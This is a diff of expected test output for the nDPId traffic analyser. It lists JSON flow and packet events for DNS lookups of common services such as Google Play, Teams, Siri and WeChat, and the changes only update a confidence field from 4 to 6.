00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123858,"flow_last_seen":1625744123858,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1625744123858,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57632,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1625744123858,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1625744123858,"pkt":"ABshv2HAVASmitEsCABFAABT3wQAAEARfrMKyAILCAgICOEgADUAPx0zyVMBIAABAAAAAAABB2FuZHJvaWQHY2xpZW50cwZnb29nbGUDY29tAAABAAEAACkQAAAAAAAAAA=="} -00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123858,"flow_last_seen":1625744123858,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1625744123858,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57632,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123858,"flow_last_seen":1625744123858,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1625744123858,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57632,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1625744123885,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":377,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":377,"pkt_l4_len":343,"thread_ts_msec":1625744123885,"pkt":"VASmitEsEL9IThY0CABFAAFrZGIAADwR\/D0ICAgICsgCCwA14SABV21MyVOBgAABABEAAAABB2FuZHJvaWQHY2xpZW50cwZnb29nbGUDY29tAAABAAHADAAFAAEAAAECAAwHYW5kcm9pZAFswBzAOAABAAEAAAECAARssQ5lwDgAAQABAAABAgAEbLEOccA4AAEAAQAAAQIABEp9g2XAOAABAAEAAAECAARKfYNxwDgAAQABAAABAgAESn2DZsA4AAEAAQAAAQIABEp9g2TAOAABAAEAAAECAARKfYOKwDgAAQABAAABAgAESn2Di8A4AAEAAQAAAQIABEp9zWXAOAABAAEAAAECAARKfc2LwDgAAQABAAABAgAESn3NZMA4AAEAAQAAAQIABEDpoWbAOAABAAEAAAECAARA6aFlwDgAAQABAAABAgAEQOmhisA4AAEAAQAAAQIABEDppIrAOAABAAEAAAECAARA6aRkAAApAgAAAAAAAAA="} -00813{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123858,"flow_last_seen":1625744123885,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":390,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1625744123885,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57632,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":1,"num_answers":18,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"108.177.14.101"}} +00813{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123858,"flow_last_seen":1625744123885,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":390,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1625744123885,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57632,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":1,"num_answers":18,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"108.177.14.101"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123890,"flow_last_seen":1625744123890,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1625744123890,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":42790,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1625744123890,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1625744123890,"pkt":"ABshv2HAVASmitEsCABFAABO3wwAAEARfrAKyAILCAgICKcmADUAOh0utWIBIAABAAAAAAABASoFdGVhbXMJbWljcm9zb2Z0A2NvbQAAAQABAAApEAAAAAAAAAA="} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123890,"flow_last_seen":1625744123890,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1625744123890,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":42790,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"_.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123890,"flow_last_seen":1625744123890,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1625744123890,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":42790,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"_.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1625744123973,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1625744123973,"pkt":"VASmitEsEL9IThY0CABFAACY7gkAADwRc2kICAgICsgCCwA1pyYAhI+OtWKBgwABAAAAAQABASoFdGVhbXMJbWljcm9zb2Z0A2NvbQAAAQABwBQABgABAAABKwA+B25zMS0yMDUJYXp1cmUtZG5zwB4TYXp1cmVkbnMtaG9zdG1hc3RlcsAUAAAAAQAADhAAAAEsACTqAAAAASwAACkCAAAAAAAAAA=="} -00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123890,"flow_last_seen":1625744123973,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1625744123973,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":42790,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"_.teams.microsoft.com","num_queries":1,"num_answers":2,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123890,"flow_last_seen":1625744123973,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1625744123973,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":42790,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"_.teams.microsoft.com","num_queries":1,"num_answers":2,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123977,"flow_last_seen":1625744123977,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1625744123977,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44198,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1625744123977,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"thread_ts_msec":1625744123977,"pkt":"ABshv2HAVASmitEsCABFAABS3y4AAEARfooKyAILCAgICKymADUAPh0yDWEBIAABAAAAAAABDHdpZGUteW91dHViZQFsBmdvb2dsZQNjb20AAAEAAQAAKRAAAAAAAAAA"} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123977,"flow_last_seen":1625744123977,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1625744123977,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44198,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"wide-youtube.l.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123977,"flow_last_seen":1625744123977,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1625744123977,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44198,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"wide-youtube.l.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1625744124006,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1625744124006,"pkt":"VASmitEsEL9IThY0CABFAABiUocAADwRDyIICAgICsgCCwA1rKYATu57DWGBgAABAAEAAAABDHdpZGUteW91dHViZQFsBmdvb2dsZQNjb20AAAEAAcAMAAEAAQAAASsABEDppMYAACkCAAAAAAAAAA=="} -00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123977,"flow_last_seen":1625744124006,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1625744124006,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44198,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"wide-youtube.l.google.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"64.233.164.198"}} +00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123977,"flow_last_seen":1625744124006,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1625744124006,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44198,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"wide-youtube.l.google.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"64.233.164.198"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744124010,"flow_last_seen":1625744124010,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1625744124010,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":52541,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1625744124010,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1625744124010,"pkt":"ABshv2HAVASmitEsCABFAABK30QAAEARfnwKyAILCAgICM09ADUANh0qX5cBIAABAAAAAAABB2d1enpvbmkFYXBwbGUDY29tAAABAAEAACkQAAAAAAAAAA=="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744124010,"flow_last_seen":1625744124010,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1625744124010,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":52541,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"guzzoni.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744124010,"flow_last_seen":1625744124010,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1625744124010,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":52541,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"guzzoni.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00587{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1625744124069,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1625744124069,"pkt":"VASmitEsEL9IThY0CABFAACEUooAADwRDv0ICAgICsgCCwA1zT0AcK3sX5eBgAABAAIAAAABB2d1enpvbmkFYXBwbGUDY29tAAABAAHADAAFAAEAAAK5AB4RZ3V6em9uaS1hcHBsZS1jb20BdgdhYXBsaW1nwBrALwABAAEAAAErAAQRghUFAAApAgAAAAAAAAA="} -00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744124010,"flow_last_seen":1625744124069,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1625744124069,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":52541,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"guzzoni.apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.130.21.5"}} +00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744124010,"flow_last_seen":1625744124069,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1625744124069,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":52541,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"guzzoni.apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.130.21.5"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744124073,"flow_last_seen":1625744124073,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1625744124073,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":53951,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1625744124073,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1625744124073,"pkt":"ABshv2HAVASmitEsCABFAABM31QAAEARfmoKyAILCAgICNK\/ADUAOB0sVeABIAABAAAAAAABBXNob3J0BndlaXhpbgJxcQNjb20AAAEAAQAAKRAAAAAAAAAA"} -00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744124073,"flow_last_seen":1625744124073,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1625744124073,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":53951,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"short.weixin.qq.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744124073,"flow_last_seen":1625744124073,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1625744124073,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":53951,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"short.weixin.qq.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00555{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1625744124417,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"thread_ts_msec":1625744124417,"pkt":"VASmitEsEL9IThY0CABFAABsvHUAADwRpSkICAgICsgCCwA10r8AWILaVeCBgAABAAIAAAABBXNob3J0BndlaXhpbgJxcQNjb20AAAEAAcAMAAEAAQAAAlcABMvN\/k3ADAABAAEAAAJXAATLzf7cAAApAgAAAAAAAAA="} -00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744124073,"flow_last_seen":1625744124417,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1625744124417,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":53951,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"short.weixin.qq.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.254.77"}} +00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744124073,"flow_last_seen":1625744124417,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1625744124417,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":53951,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"short.weixin.qq.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.254.77"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744124422,"flow_last_seen":1625744124422,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1625744124422,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44883,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1625744124422,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1625744124422,"pkt":"ABshv2HAVASmitEsCABFAABY4G8AAEARfUMKyAILCAgICK9TADUARB047MoBIAABAAAAAAABCWluc3RhZ3JhbQdmYWFlMS0xA2ZuYQVmYmNkbgNuZXQAAAEAAQAAKRAAAAAAAAAA"} -00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744124422,"flow_last_seen":1625744124422,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1625744124422,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44883,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 